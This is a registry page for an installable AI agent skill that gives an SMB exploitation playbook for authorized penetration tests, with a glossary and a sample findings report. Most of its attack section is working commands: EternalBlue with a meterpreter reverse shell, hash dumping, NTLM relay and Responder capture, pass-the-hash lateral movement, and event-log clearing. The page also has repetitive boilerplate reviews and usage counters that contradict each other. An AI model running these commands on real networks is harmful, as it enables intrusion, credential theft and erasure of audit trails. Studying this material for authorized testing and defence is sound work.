Identifies and exploits SMB protocol vulnerabilities using Metasploit Framework during authorized penetration tests to demonstrate risks from unpatched Windows systems, misconfigured shares, and weak authentication in enterprise networks.
Works with
AI-first code editor with Composer
Before installing skills in Cursor, ensure your development environment meets these requirements:
node --versionexploiting-smb-vulnerabilities-with-metasploitExecute the skills CLI command in your project's root directory to begin installation:
Fetches exploiting-smb-vulnerabilities-with-metasploit from mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
The CLI shows a list of agents. Use arrow keys and space to select Cursor:
Confirm successful installation by checking the skill directory location:
Restart Cursor to activate exploiting-smb-vulnerabilities-with-metasploit. Access via /exploiting-smb-vulnerabilities-with-metasploit in your agent's command palette.
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Submit your Claude Code skill and start earning
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
0
total installs
0
this week
8.6K
GitHub stars
0
upvotes
Run in your terminal
0
installs
0
this week
8.6K
stars
| name | exploiting-smb-vulnerabilities-with-metasploit |
| description | 'Identifies and exploits SMB protocol vulnerabilities using Metasploit Framework during authorized penetration tests to demonstrate risks from unpatched Windows systems, misconfigured shares, and weak authentication in enterprise networks. ' |
| domain | cybersecurity |
| subdomain | network-security |
| tags | - network-security - smb - metasploit - exploitation - eternalblue |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.IR-01 - DE.CM-01 - ID.AM-03 - PR.DS-02 |
Do not use against systems without explicit written authorization, against production domain controllers without a maintenance window, or to deploy persistent backdoors beyond the scope of the assessment.
msfconsole --version)# Discover hosts with SMB open using Nmap
nmap -sS -p 445,139 --open -oA smb_hosts 10.10.0.0/24
# Enumerate SMB versions and OS information
nmap -sV -p 445 --script smb-os-discovery,smb-protocols -oA smb_enum 10.10.0.0/24
# Use CrackMapExec for rapid SMB enumeration
crackmapexec smb 10.10.0.0/24 --gen-relay-list smb_nosigning.txt
# Check SMB signing status (disabled = vulnerable to relay)
crackmapexec smb 10.10.0.0/24 --smb-signing
# Enumerate shares with null session
crackmapexec smb 10.10.0.0/24 -u '' -p '' --shares
# Start Metasploit and scan for MS17-010 (EternalBlue)
msfconsole -q
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(smb_ms17_010)> set RHOSTS file:smb_hosts.txt
msf6 auxiliary(smb_ms17_010)> set THREADS 10
msf6 auxiliary(smb_ms17_010)> run
# Scan for MS08-067 (Conficker vulnerability)
msf6> use auxiliary/scanner/smb/ms08_067_check
msf6 auxiliary(ms08_067_check)> set RHOSTS file:smb_hosts.txt
msf6 auxiliary(ms08_067_check)> run
# Check for SMBGhost (CVE-2020-0796)
nmap -p 445 --script smb-vuln-cve-2020-0796 10.10.0.0/24
# Check for PrintNightmare (CVE-2021-34527)
crackmapexec smb 10.10.0.0/24 -u testuser -p 'TestPass123' -M printnightmare
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue)> set RHOSTS 10.10.5.23
msf6 exploit(ms17_010_eternalblue)> set LHOST 10.10.1.99
msf6 exploit(ms17_010_eternalblue)> set LPORT 4444
msf6 exploit(ms17_010_eternalblue)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue)> set MaxExploitAttempts 3
msf6 exploit(ms17_010_eternalblue)> exploit
# Post-exploitation -- verify access level
meterpreter> getuid
# Server username: NT AUTHORITY\SYSTEM
meterpreter> sysinfo
meterpreter> ipconfig
meterpreter> hashdump
# Identify hosts without SMB signing (from Step 1)
# Set up NTLM relay with Impacket
sudo impacket-ntlmrelayx -tf smb_nosigning.txt -smb2support -i
# Trigger authentication from a compromised host or via phishing
# From Meterpreter session on a compromised host:
meterpreter> shell
C:\> net use \\10.10.1.99\share /user:DOMAIN\admin password
# Or use Metasploit's SMB relay module
msf6> use exploit/windows/smb/smb_relay
msf6 exploit(smb_relay)> set SMBHOST 10.10.5.30
msf6 exploit(smb_relay)> set LHOST 10.10.1.99
msf6 exploit(smb_relay)> exploit
# Use responder to capture NTLM hashes for offline cracking
sudo responder -I eth0 -wrfv
# Extract hashes from compromised system
meterpreter> hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
# Use pass-the-hash with CrackMapExec
crackmapexec smb 10.10.0.0/24 -u Administrator \
-H e19ccf75ee54e06b06a5907af13cef42 --shares
# Execute commands via pass-the-hash
crackmapexec smb 10.10.5.30 -u Administrator \
-H e19ccf75ee54e06b06a5907af13cef42 -x "whoami && hostname"
# Use Impacket psexec for interactive shell
impacket-psexec [email protected] \
-hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
# Use Metasploit psexec module
msf6> use exploit/windows/smb/psexec
msf6 exploit(psexec)> set RHOSTS 10.10.5.30
msf6 exploit(psexec)> set SMBUser Administrator
msf6 exploit(psexec)> set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
msf6 exploit(psexec)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(psexec)> set LHOST 10.10.1.99
msf6 exploit(psexec)> exploit
# Document all compromised systems and access levels
# In Meterpreter, screenshot desktops for evidence
meterpreter> screenshot
# List accessible shares and sensitive data
meterpreter> shell
C:\> net share
C:\> dir \\10.10.5.30\C$\Users\ /s /b
# Clean up -- remove any artifacts
meterpreter> clearev
meterpreter> shell
C:\> del /f C:\Windows\Temp\payload.exe
# Close all sessions
msf6> sessions -K
# Verify cleanup
crackmapexec smb 10.10.5.23 -u Administrator -H <hash> -x "dir C:\Windows\Temp\payload*"
| Term | Definition |
|---|---|
| EternalBlue (MS17-010) | Critical SMB vulnerability in SMBv1 allowing remote code execution as SYSTEM without authentication, originally developed by the NSA and leaked by Shadow Brokers |
| SMB Signing | Cryptographic signing of SMB packets to prevent tampering and relay attacks; when disabled, attackers can relay NTLM authentication to other SMB hosts |
| Pass-the-Hash | Authentication technique using captured NTLM password hashes directly instead of plaintext passwords, bypassing the need to crack the hash |
| NTLM Relay | Attack where captured NTLM authentication is forwarded to a different server in real-time, granting the attacker access as the relayed user |
| PsExec | Remote execution technique that uploads a service binary to the ADMIN$ share and creates a Windows service to execute commands as SYSTEM |
| Null Session | Anonymous SMB connection (empty username and password) that may expose share listings, user enumeration, and policy information on misconfigured systems |
Context: During an internal penetration test for a financial services firm, the tester has network access to the corporate VLAN (10.10.0.0/16). The scope includes testing all Windows servers and workstations for SMB-related vulnerabilities. Active Directory domain is CORP.EXAMPLE.COM with approximately 200 hosts.
Approach:
Pitfalls:
## SMB Vulnerability Assessment Report
**Engagement**: Internal Penetration Test
**Target Range**: 10.10.0.0/16 (CORP.EXAMPLE.COM)
**SMB Hosts Discovered**: 187
### Critical Findings
**Finding 1: MS17-010 (EternalBlue) - 12 Unpatched Hosts**
- Severity: Critical (CVSS 9.8)
- Affected: 10.10.5.23, 10.10.5.24, 10.10.8.10 (+ 9 others)
- Impact: Remote code execution as SYSTEM without authentication
- Exploited: Yes - gained SYSTEM on 10.10.5.23
- Remediation: Apply MS17-010 patch, disable SMBv1
**Finding 2: SMB Signing Disabled - 155/187 Hosts**
- Severity: High (CVSS 7.5)
- Impact: NTLM relay attacks allow credential forwarding
- Exploited: Yes - relayed domain admin credentials
- Remediation: Enable SMB signing via Group Policy
**Finding 3: Local Admin Password Reuse - 47 Hosts**
- Severity: High (CVSS 7.2)
- Impact: Compromise of one host enables lateral movement to 47 systems
- Remediation: Deploy LAPS (Local Administrator Password Solution)
Prerequisites
Time Estimate
15-45 minutes depending on use case complexity
Steps
Common Pitfalls
✓ Do
✗ Don't
💡 Pro Tips
✓ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
Useful defaults in exploiting-smb-vulnerabilities-with-metasploit — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
We added exploiting-smb-vulnerabilities-with-metasploit from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.
We added exploiting-smb-vulnerabilities-with-metasploit from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.
exploiting-smb-vulnerabilities-with-metasploit fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
Useful defaults in exploiting-smb-vulnerabilities-with-metasploit — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
Solid pick for teams standardizing on skills: exploiting-smb-vulnerabilities-with-metasploit is focused, and the summary matches what you get after install.
Registry listing for exploiting-smb-vulnerabilities-with-metasploit matched our evaluation — installs cleanly and behaves as described in the markdown.
Solid pick for teams standardizing on skills: exploiting-smb-vulnerabilities-with-metasploit is focused, and the summary matches what you get after install.
exploiting-smb-vulnerabilities-with-metasploit fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
exploiting-smb-vulnerabilities-with-metasploit is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
showing 1-10 of 74